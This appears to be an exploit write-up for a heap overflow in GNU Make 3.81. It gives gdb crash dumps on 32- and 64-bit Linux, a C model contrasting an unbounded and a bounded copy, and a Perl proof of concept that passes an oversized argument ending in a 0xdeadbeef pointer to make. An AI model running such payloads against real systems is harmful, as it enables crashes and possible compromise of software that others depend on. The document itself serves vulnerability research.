=for comment
# Exploit Title: MAKE Heap Overflow - Pointer dereferencing POC (Calloc)-X86 X64
# Date: [14.07.14]
# Exploit Author: HyP
# Vendor Homepage: http://www.gnu.org/software/make/
# Software Link: http://ftp.gnu.org/gnu/make/
# Version: Make 3.81
# Tested on: Linux 32/64 bits (Fedora, Debian, Ubuntu, Arch)
# CVE : none
*******************************************************************************************
Special Thanks:
kmkz
Zadyree
Sec0d Team
*******************************************************************************************
*******************************************************************************************
32bits
./checksec.sh --file make
RELRO      STACK CANARY      NX          PIE     RPATH     RUNPATH     FILE
No RELRO   No canary found   NX enabled  No PIE  No RPATH  No RUNPATH  make
gdb-peda$ r `perl -e 'print "A" x 4000 . "B"x96 . "\xef\xbe\xad\xde"x4'`
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
...
EAX: 0xdeadbeef
EBX: 0x807b971 --> 0x6f2e ('.o')
ECX: 0x0
EDX: 0x1
ESI: 0xdeadbeef
EDI: 0x0
EBP: 0xbfffc5e8 --> 0xbfffc698 --> 0x8081de0 --> 0x0
ESP: 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o')
EIP: 0x80548b2 (mov eax,DWORD PTR [eax])
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80548aa: je 0x80548b8
0x80548ac: lea esi,[esi+eiz*1+0x0]
0x80548b0: mov esi,eax
=> 0x80548b2: mov eax,DWORD PTR [eax] <------ Pointer Dereferencing (the loop below walks a NULL-terminated chain through the pointer at offset 0 of each node; the overflow replaced that pointer with 0xdeadbeef)
0x80548b4: test eax,eax
0x80548b6: jne 0x80548b0
0x80548b8: cmp DWORD PTR [ebp-0x1034],0x1
0x80548bf: mov DWORD PTR [ebp-0x10ac],edx
[------------------------------------stack-------------------------------------]
0000| 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o')
0004| 0xbfffa314 --> 0x807b971 --> 0x6f2e ('.o')
0008| 0xbfffa318 --> 0x2
0012| 0xbfffa31c --> 0xb7ffadf8 ("symbol=%s; lookup in file=%s [%lu]\n")
0016| 0xbfffa320 --> 0x0
0020| 0xbfffa324 --> 0x0
0024| 0xbfffa328 --> 0x0
0028| 0xbfffa32c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x080548b2 in ?? ()
Overflow code:
...
80548aa: 74 0c je 80548b8 <calloc@plt+0xac38>
80548ac: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
80548b0: 89 c6 mov %eax,%esi
80548b2: 8b 00 mov (%eax),%eax
80548b4: 85 c0 test %eax,%eax
80548b6: 75 f8 jne 80548b0 <calloc@plt+0xac30>
...
gdb-peda$ x/x $eax
0x807ff68: 0x00000000
peda vmmap
Start End Perm Name
0x08048000 0x0806f000 r-xp /root/Desktop/RESEARCH/make_BoF/make
0x0806f000 0x08070000 rw-p /root/Desktop/RESEARCH/make_BoF/make
0x08070000 0x08092000 rw-p [heap] // heap overflow !!
*******************************************************************************************
*******************************************************************************************
64bits
Overflow code:
40cc59: 74 10 je 40cc6b <__ctype_b_loc@plt+0xa52b>
40cc5b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
40cc60: 48 89 c3 mov rbx,rax
40cc63: 48 8b 00 mov rax,QWORD PTR [rax] // heap overflow
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0xdeadbeefdeadbeef
RBX: 0xdeadbeefdeadbeef
RCX: 0x4242424242424242 ('BBBBBBBB')
RDX: 0x0
RSI: 0x7fffffff97d0 ('A' <repeats 200 times>...)
RDI: 0x7fffffffa7e2 --> 0x732e656c69666500 ('')
RBP: 0x7fffffffb930 --> 0x1
RSP: 0x7fffffff95f0 --> 0x0
RIP: 0x40cc63 (mov rax,QWORD PTR [rax])
R8 : 0x4242424242424242 ('BBBBBBBB')
R9 : 0x7ffff7972440 (mov dx,WORD PTR [rsi-0x2])
R10: 0x4242424242424242 ('BBBBBBBB')
R11: 0x7ffff799f990 --> 0xfffd28d0fffd2708
R12: 0x1
R13: 0x0
R14: 0x6397a0 --> 0x6f2e25 ('%.o')
R15: 0x0
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x40cc59: je 0x40cc6b
0x40cc5b: nop DWORD PTR [rax+rax*1+0x0]
0x40cc60: mov rbx,rax
=> 0x40cc63: mov rax,QWORD PTR [rax] <----- Pointer dereferencing
0x40cc66: test rax,rax
0x40cc69: jne 0x40cc60
0x40cc6b: cmp DWORD PTR [rbp-0x105c],0x1
0x40cc72: lea rdi,[rbp-0x40]
[------------------------------------stack-------------------------------------]
0000| 0x7fffffff95f0 --> 0x0
0008| 0x7fffffff95f8 --> 0x0
0016| 0x7fffffff9600 --> 0x0
0024| 0x7fffffff9608 --> 0x645e50 --> 0x646630 --> 0x64667b --> 0x5f7266006362696c ('libc')
0032| 0x7fffffff9610 --> 0xffffffdf
0040| 0x7fffffff9618 --> 0x645e58 --> 0x6462f0 --> 0x64a500 --> 0x64a541 --> 0x5f726600656b616d ('make')
0048| 0x7fffffff9620 --> 0x7ffff7bd01f8 --> 0x645e50 --> 0x646630 --> 0x64667b --> 0x5f7266006362696c ('libc')
0056| 0x7fffffff9628 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040cc63 in ?? ()
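The faulting instruction in both disassemblies is a list walk loading a next pointer that the overflow has overwritten. The following is an added model of that bug class, not GNU Make's source: a hypothetical record (fixed-size name followed by a pointer slot), the unbounded copy that spills the PoC's 0xdeadbeef marker into the slot, and the bounded form that rejects the oversized argument; NAME_LEN and the record layout are assumptions.

```c
/* Added model of the crash shown above; it is not GNU Make's code.
 * Hypothetical record: a fixed-size name followed by a "next" pointer,
 * as in the list that mov eax,[eax] / test / jne walks.  An unbounded
 * copy spills past the name into that pointer, so the walk loads
 * 0xdeadbeef.  The layout is simulated in a byte buffer, not the real heap. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define NAME_LEN 16                           /* assumed field size */
#define REC_SIZE (NAME_LEN + sizeof(uint64_t))

/* Bug class on the page: copy with no check against NAME_LEN.
 * Returns what the "next" slot holds afterwards. */
static uint64_t store_unbounded(const unsigned char *arg, size_t arg_len)
{
    unsigned char *rec = calloc(1, 64);       /* slack keeps this well-defined */
    uint64_t next = 0;
    if (!rec) return 0;
    memcpy(rec, arg, arg_len);
    memcpy(&next, rec + NAME_LEN, sizeof next);
    free(rec);
    return next;
}

/* Hardened form: reject input that does not fit (one byte kept for NUL).
 * Returns 0 on success, -1 if rejected; the pointer slot stays 0. */
static int store_bounded(const char *arg)
{
    size_t arg_len = strlen(arg);
    if (arg_len >= NAME_LEN)
        return -1;
    unsigned char *rec = calloc(1, REC_SIZE);
    if (!rec)
        return -1;
    memcpy(rec, arg, arg_len + 1);
    free(rec);
    return 0;
}

/* Constructed payload in the PoC's spirit: 'A' filler up to the pointer
 * slot, then the 0xdeadbeef marker bytes (the RAX value above). */
static uint64_t demo_corrupt(void)
{
    unsigned char payload[REC_SIZE];
    uint64_t marker = 0xdeadbeefdeadbeefULL;
    memset(payload, 'A', NAME_LEN);
    memcpy(payload + NAME_LEN, &marker, sizeof marker);
    return store_unbounded(payload, sizeof payload);
}
```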
*******************************************************************************************
*******************************************************************************************
Proof of Concept - Source code
*******************************************************************************************
*******************************************************************************************
=cut
#!/usr/bin/perl
use 5.010;
use strict;
use warnings;
use Time::HiRes qw(sleep);   # core sleep() truncates 0.5 to 0 seconds

say "Please set ulimit value to 1000 before (ulimit -c 1000) ";
sleep 0.5;

my $buff = "A" x 4096;             # filler up to the overwritten pointer field
my $addr = "\xef\xbe\xad\xde";     # 0xdeadbeef, little-endian, lands in the pointer
my $make = "./make";
my $gdb  = "gdb $make --core core";  # load the binary too so gdb can resolve symbols

# Build the payload in-process; spawning a second perl just to print it
# was unnecessary and pushed the raw bytes through the shell.
my $PAYLOAD = $buff . $addr;

# Pass the payload as a single argv entry (list form: no shell re-parsing).
system($make, $PAYLOAD);

say " Reading Core file GDB ";
sleep 0.5;
system($gdb);